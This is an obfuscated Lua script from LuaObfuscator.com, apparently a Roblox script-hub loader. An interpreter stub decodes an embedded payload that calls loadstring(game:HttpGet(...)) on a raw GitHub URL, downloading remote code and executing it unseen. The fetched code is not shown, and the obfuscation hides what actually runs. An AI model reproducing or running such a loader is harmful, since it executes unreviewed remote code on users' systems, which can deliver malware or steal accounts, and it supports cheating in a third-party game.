--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.2) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (5==v18) then v27=v24;v28=nil;v28=function(...)return {...},v12("#",...);end;v18=6;end if (v18==1) then v21=nil;v21=function(v31,v32,v33)if v33 then local v72=0 -0;local v73;while true do if ((322 -((1909 -(762 + 952)) + 35 + 92))==v72) then v73=(v31/((1609 -(1233 + 374))^(v32-1)))%((2 + 0)^(((v33-(1 + 0)) -(v32-(159 -(51 + 107)))) + 1 + 0));return v73-(v73%(3 -2));end end else local v74=(4498 -2534) -(1455 + 509);local v75;while true do if (v74==(0 + (1436 -(155 + 1281)))) then v75=(4 -2)^(v32-(810 -(735 + 74)));return (((v31%(v75 + v75))>=v75) and 1) or (0 -0);end end end end;v22=nil;v18=2;end if (v18==3) then v24=nil;v24=function()local v39=0 -0;local v40;local v41;local v42;local v43;while true do if (v39==((1480 -(1049 + 431)) -0)) then v40,v41,v42,v43=v1(v16,v19,v19 + (728 -(422 + 303)));v19=v19 + 2 + 2;v39=1015 -(664 + 350);end if (((1047 -(712 + 13)) -(140 + 181))==v39) then return (v43 * (12698968 + 4078248)) + (v42 * (124570 -59034)) + (v41 * (484 -228)) + v40;end end end;v25=nil;v18=4;end if (v18==7) then v30=function(v34,v35,v36)local v44=0;local v45;local v46;local v47;while true do if (v44==1) then v47=v34[3];return function(...)local v87=1;local v88= -1;local v89={...};local v90=v12("#",...) -1;local function v91()local v92=v45;local v93=v46;local v94=v47;local v95=v28;local v96={};local v97={};local v98={};for v102=0 + 0,v90 do if ((3449>=((1038 -(280 + 504)) + 573)) and (v102>=v94)) then v96[v102-v94]=v89[v102 + 1];else v98[v102]=v89[v102 + 1 + 0];end end local v99=(v90-v94) + (1397 -(599 + 797));local v100;local v101;while true do local v103=837 -(798 + 39);local v104;local v105;while true do if ((v103==(0 + 0)) or (85>(10 + (1721 -(331 + 23))))) then v104=0 + 0;v105=nil;v103=1654 -(1275 + 378);end if (((82 + 94)==176) and (v103==(1123 -(118 + 1004)))) then while true do if ((v104==0) or ((312 + 760 + (13305 -9545))<=(12128 -(12486 -2833)))) then v105=0 -0;while true do if ((v105==(0 + 0)) or ((4622 -(21 + 961))>((10714 -5744) -((971 -(532 + 345)) + 174)))) then local v120=0;while true do if ((v120==(0 + 0)) or (33>((302 + 1285) -(255 + 113)))) then local v122=0 -0;while true do if (((3365 -(1378 -(209 + 104)))>=2105) and ((0 -0)==v122)) then v100=v92[v87];v101=v100[1 + 0];v122=535 -(142 + 392);end if ((v122==(256 -(145 + 110))) or (307>(7166 -3579))) then v120=1;break;end end end if (((296 + 243)<4059) and (v120==(1 + 0))) then v105=1 + 0;break;end end end if ((v105==(1 + (1577 -(553 + 1024)))) or ((5936 -(1041 + 380))<=((5318 -4171) + 248 + 1231))) then if ((v101<=(1 + 1)) or ((28 + 740 + 3099)<=(172 + 132))) then if ((v101<=(0 + 0)) or (((867 -(111 + 142)) + 227)>(5047 -(406 + (2838 -1547))))) then do return;end elseif (((1629 + 1338 + 105)<(7348 -4076)) and (v101==(1 + (1035 -(331 + 704))))) then local v132=0 -0;local v133;local v134;local v135;local v136;while true do if (((0 -0)==v132) or ((4146 -((441 -253) + 415))==3135)) then local v147=1395 -(24 + 5 + 1366);while true do if (((3987 -(23 + 448))>(4510 -(986 + 747))) and ((0 -(1534 -(53 + 1481)))==v147)) then v133=v100[1665 -(1038 + 625)];v134,v135=v95(v98[v133](v13(v98,v133 + ((1014 + 773) -(355 + 1431)),v100[2 + 1])));v147=568 -(176 + 391);end if ((((2353 + 3254) -3985)==(117 + (5069 -3564))) and (v147==(1 + 0))) then v132=1 + 0;break;end end end if (((4303 -(447 + 61))>(129 -(65 + 26))) and ((73 -(14 + 58))==v132)) then local v148=0;while true do if ((((1 + 0) -0)==v148) or (1607>=(2649 + 615))) then v132=2 -0;break;end if (((5597 -3433)==(538 + 1626)) and (v148==(1570 -(1308 + 262)))) then v88=(v135 + v133) -(1 + 0);v136=0 + 0;v148=1296 -(922 + 373);end end end if (((1886 -1264)<(674 + 225)) and (v132==(1 + 1))) then for v153=v133,v88 do local v154=0;local v155;local v156;while true do if ((v154==1) or ((10287 -6242)<=(4295 -(406 + 104)))) then while true do if ((v155==((145 + 843) -(979 + 9))) or ((3296 -(198 + 418))<=((6811 -4885) -(38 + 159)))) then v156=133 -(20 + (1763 -(983 + 667)));while true do if (((2687 + 54)<((2255 -(126 + 1179)) + 3477)) and (v156==(689 -(223 + (1472 -1006))))) then v136=v136 + 1;v98[v153]=v134[v136];break;end end break;end end break;end if ((164<(4590 -2457)) and (0==v154)) then v155=0 + 0;v156=nil;v154=1;end end end break;end end else v98[v100[1906 -((2883 -(1007 + 649)) + 677)]]();end elseif ((v101<=((305 -(131 + 164)) -6)) or ((9988 -7902)<(1498 -(521 + 512)))) then if (((23 + 400)<(9118 -6743)) and (v101==(6 -3))) then v98[v100[1990 -(1106 + 882)]]=v36[v100[3 + 0]];else v98[v100[1671 -(9 + 1425 + 235)]]=v100[2 + 1];end elseif ((v101==(1423 -((2744 -(1009 + 549)) + 232))) or ((1290 + 1853)<=(503 -271))) then local v141=0;local v142;local v143;local v144;while true do if (((2121 + 2094)>=3940) and (v141==(1 + 0))) then v144=nil;while true do if (((4560 -(757 + 1051))>(47 + 15)) and (v142==1)) then v98[v143 + ((9 -5) -(1133 -(507 + 623)))]=v144;v98[v143]=v144[v100[4]];break;end if ((v142==(0 -0)) or (3544>(9893 -6214))) then local v165=0 -0;while true do if ((((1729 -(628 + 597)) + 1637)==2141) and (v165==(1 + 0))) then v142=2 -(947 -(624 + 322));break;end if ((v165==0) or (4296==(2865 + 2024))) then local v170=0 -0;while true do if ((4740>=477) and (v170==(0 + 0))) then v143=v100[5 -3];v144=v98[v100[6 -3]];v170=574 -(284 + 289);end if ((v170==1) or ((927 + 690 + 560)==(2204 -(303 + 1084)))) then v165=321 -(278 + 42);break;end end end end end end break;end if ((3084>(1638 -550)) and (v141==(1149 -(778 + 371)))) then local v149=1211 -(720 + 491);while true do if ((v149==(1 + 0)) or ((549 -((654 -(178 + 185)) + 188))>=(5846 -2405))) then v141=1 + 0;break;end if (((8618 -4302)<=(5216 -(288 + (37 -9)))) and (v149==0)) then v142=0 + 0;v143=nil;v149=1 + 0;end end end end else local v145=0 -0;local v146;while true do if (((1036 -(735 + 301))==v145) or ((4979 -((2458 -1710) + 973))<=(5916 -3664))) then v146=v100[1 + 1];v98[v146]=v98[v146](v13(v98,v146 + (562 -(467 + 94)),v88));break;end end end v87=v87 + 1;break;end end break;end end break;end end end end A,B=v28(v11(v91));if  not A[1] then local v106=v34[4][v87] or "?";error("Script error at ["   .. v106   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end if (v44==0) then v45=v34[1];v46=v34[2];v44=1;end end end;return v30(v29(),{},v17)(...);end if (v18==4) then v25=function()local v48=0 + 0;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v48==(3 + 0)) then if (v53==0) then if (v52==0) then return v54 * 0;else local v110=0 + 0;while true do if (v110==(0 -0)) then v53=1 + 0;v51=974 -(403 + 571);break;end end end elseif (v53==(1225 + 822)) then return ((v52==0) and (v54 * (((56 + 73) -(106 + 22))/(0 -0)))) or (v54 * NaN);end return v8(v54,v53-(4684 -3661)) * (v51 + (v52/(((1410 -(100 + 1309)) + 1)^(150 -(37 + 61)))));end if (v48==((7 -4) -1)) then v53=v21(v50,59 -38,30 + 1 + 0);v54=((v21(v50,(423 -(177 + 192)) -22)==(3 -2)) and  -(966 -(789 + 176))) or (1 -0);v48=351 -(317 + 31);end if (v48==(486 -(134 + 351))) then v51=2 -1;v52=(v21(v50,1 + 0,11 + 4 + 5) * (2^32)) + v49;v48=1815 -(181 + 1632);end if (v48==(0 + 0)) then v49=v24();v50=v24();v48=1505 -(289 + 1215);end end end;v26=nil;v26=function(v37)local v55;if  not v37 then local v76=0 -0;while true do if (v76==(1934 -(325 + 1609))) then v37=v24();if (v37==((0 -0) + 0)) then return "";end break;end end end v55=v3(v16,v19,(v19 + v37) -1);v19=v19 + v37;local v56={};for v70=1 + 0, #v55 do v56[v70]=v2(v1(v3(v55,v70,v70)));end return v6(v56);end;v18=5;end if (v18==6) then v29=nil;v29=function()local v57=0;local v58;local v59;local v60;local v61;local v62;local v63;local v64;local v65;while true do if (v57==0) then local v83=0;while true do if (0==v83) then v58=0;v59=nil;v83=730 -(194 + 535);end if (v83~=(590 -(284 + 305))) then else v57=2 -1;break;end end end if (4==v57) then while true do if (v58==(9 -6)) then v65=nil;while true do local v111=0 + 0;local v112;while true do if (v111==(0 -0)) then v112=0 -0;while true do if (v112~=(1221 -(872 + 349))) then else local v119=0 -0;while true do if (v119==(1648 -(136 + 1511))) then v112=2 -1;break;end if (v119~=0) then else if (v59==(4 -2)) then local v123=0;local v124;local v125;while true do if (v123==1) then while true do if (v124==(720 -(404 + 316))) then v125=1187 -(207 + 980);while true do if (v125==(551 -(283 + 267))) then for v167=2 -1,v24() do v62[v167]=v24();end return v63;end if (v125~=(1430 -(775 + 655))) then else local v166=0;while true do if (v166~=1) then else v125=1 + 0;break;end if (0==v166) then for v171=447 -(178 + 268),v24() do local v172=0;local v173;local v174;local v175;local v176;while true do if (v172==(1 + 0)) then v175=nil;v176=nil;v172=2;end if ((127 -(26 + 101))==v172) then v173=0 -0;v174=nil;v172=1;end if (v172==(5 -3)) then while true do if ((1245 -(1116 + 128))~=v173) then else v176=nil;while true do if (v174==(781 -(166 + 614))) then while true do if (v175==(0 -0)) then v176=v22();if (v21(v176,1,2 -1)==(0 -0)) then local v186=0 -0;local v187;local v188;local v189;local v190;local v191;while true do if (v186==(0 -0)) then v187=0;v188=nil;v186=3 -2;end if (v186==2) then v191=nil;while true do if (v187==(1941 -(779 + 1161))) then v190=nil;v191=nil;v187=5 -3;end if ((7 -5)==v187) then while true do if (v188==2) then local v193=0;while true do if (v193~=1) then else v188=3;break;end if (v193~=(0 + 0)) then else if (v21(v190,1 -0,1 -0)~=(1 + 0)) then else v191[986 -(253 + 731)]=v65[v191[1 + 1]];end if (v21(v190,2,2)~=1) then else v191[6 -3]=v65[v191[3]];end v193=1;end end end if ((0 -0)==v188) then local v194=0;while true do if (v194==(0 + 0)) then v189=v21(v176,993 -(170 + 821),3);v190=v21(v176,4,6);v194=1;end if (v194~=1) then else v188=1 + 0;break;end end end if (v188==(1 + 0)) then v191={v23(),v23(),nil,nil};if (v189==(1475 -(1159 + 316))) then local v196=0 + 0;while true do if (v196==(0 + 0)) then v191[757 -(101 + 653)]=v23();v191[4]=v23();break;end end elseif (v189==(1296 -(670 + 625))) then v191[761 -(241 + 517)]=v24();elseif (v189==(7 -5)) then v191[3]=v24() -(2^16);elseif (v189==3) then local v207=0;local v208;local v209;while true do if (v207~=(429 -(153 + 276))) then else v208=0 -0;v209=nil;v207=1720 -(296 + 1423);end if (v207==1) then while true do if (v208==0) then v209=0 -0;while true do if (v209~=(0 + 0)) then else v191[1608 -(1328 + 277)]=v24() -((5 -3)^(33 -17));v191[14 -10]=v23();break;end end break;end end break;end end end v188=2;end if (3==v188) then if (v21(v190,1508 -(238 + 1267),368 -(37 + 328))==1) then v191[4]=v65[v191[4]];end v60[v171]=v191;break;end end break;end if (v187==(461 -(110 + 351))) then local v192=0;while true do if (v192~=(0 -0)) then else v188=0;v189=nil;v192=1;end if (v192==(764 -(225 + 538))) then v187=399 -(300 + 98);break;end end end end break;end if (v186==1) then v189=nil;v190=nil;v186=2;end end end break;end end break;end if (v174~=(1173 -(993 + 180))) then else local v184=0 -0;local v185;while true do if (v184~=0) then else v185=0;while true do if (v185==1) then v174=313 -(203 + 109);break;end if (0==v185) then v175=0;v176=nil;v185=1;end end break;end end end end break;end if (0~=v173) then else local v183=0 + 0;while true do if (v183~=0) then else v174=0;v175=nil;v183=2 -1;end if (v183~=(2 -1)) then else v173=1498 -(1169 + 328);break;end end end end break;end end end for v177=2 -1,v24() do v61[v177-(517 -(502 + 14))]=v29();end v166=950 -(803 + 146);end end end end break;end end break;end if ((0 + 0)==v123) then v124=0 + 0;v125=nil;v123=1934 -(177 + 1756);end end end if (v59==(1 -0)) then local v126=0;local v127;while true do if (0==v126) then v127=0 + 0;while true do if ((0 + 0)~=v127) then else v64=v24();v65={};v127=1;end if (v127==1) then for v157=4 -3,v64 do local v158=0;local v159;local v160;while true do if (1~=v158) then else if (v159==(215 -(57 + 157))) then v160=v22()~=0;elseif (v159==2) then v160=v25();elseif (v159==3) then v160=v26();end v65[v157]=v160;break;end if (0==v158) then v159=v22();v160=nil;v158=1;end end end v63[142 -(91 + 48)]=v22();v127=2;end if (v127==(1 + 1)) then v59=2 + 0;break;end end break;end end end v119=1;end end end if (v112==(2 -1)) then if ((216 -(165 + 51))~=v59) then else local v121=0 + 0;while true do if (v121~=(0 + 0)) then else local v128=0;while true do if (v128~=(0 -0)) then else v60={};v61={};v128=1;end if (v128~=1) then else v121=1;break;end end end if (v121~=(1946 -(1166 + 778))) then else v59=174 -(171 + 2);break;end if (v121==1) then local v129=0;while true do if (v129==1) then v121=2;break;end if (v129==(0 -0)) then v62={};v63={v60,v61,nil,v62};v129=1;end end end end end break;end end break;end end end break;end if (v58==0) then local v107=664 -(341 + 323);while true do if (v107==0) then v59=0;v60=nil;v107=1 -0;end if (1~=v107) then else v58=1 + 0;break;end end end if (v58~=(1 -0)) then else local v108=0;while true do if (v108~=0) then else local v118=0;while true do if (v118~=0) then else v61=nil;v62=nil;v118=1 + 0;end if ((1 -0)~=v118) then else v108=1;break;end end end if (v108==(4 -3)) then v58=2;break;end end end if (v58==(692 -(287 + 403))) then local v109=0 -0;while true do if (v109==0) then v63=nil;v64=nil;v109=386 -(252 + 133);end if ((1639 -(1059 + 579))~=v109) then else v58=3;break;end end end end break;end if (v57~=(115 -(56 + 57))) then else local v84=0 + 0;while true do if (v84~=(1384 -(577 + 806))) then else v57=3;break;end if (v84~=(0 -0)) then else v62=nil;v63=nil;v84=3 -2;end end end if (v57==3) then local v85=0 + 0;while true do if (v85~=1) then else v57=2 + 2;break;end if ((1037 -(290 + 747))~=v85) then else v64=nil;v65=nil;v85=1 -0;end end end if (v57==(1 + 0)) then local v86=0;while true do if (v86==0) then v60=nil;v61=nil;v86=1;end if (v86==1) then v57=2;break;end end end end end;v30=nil;v18=7;end if (v18==2) then v22=function()local v66=v1(v16,v19,v19);v19=v19 + 1;return v66;end;v23=nil;v23=function()local v67=1426 -(162 + 1264);local v68;local v69;while true do if (v67==(1 + 0)) then return (v69 * 256) + v68;end if (v67==((0 + 0) -0)) then v68,v69=v1(v16,v19,v19 + (2 -0));v19=v19 + (2 -0);v67=1 -0;end end end;v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then local v77=0;while true do if (v77==0) then v20=v0(v3(v38,1,1));return "";end end else local v78=0;local v79;while true do if (v78==0) then v79=v2(v0(v38,16));if v20 then local v113=v5(v79,v20);v20=nil;return v113;else return v79;end break;end end end end);v18=1;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5073785363726F7074532F2O476875627A2F6D61696E2F5800083O0012033O00013O001203000100023O002005000100010003001204000300044O0001000100034O00065O00022O00023O000100016O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
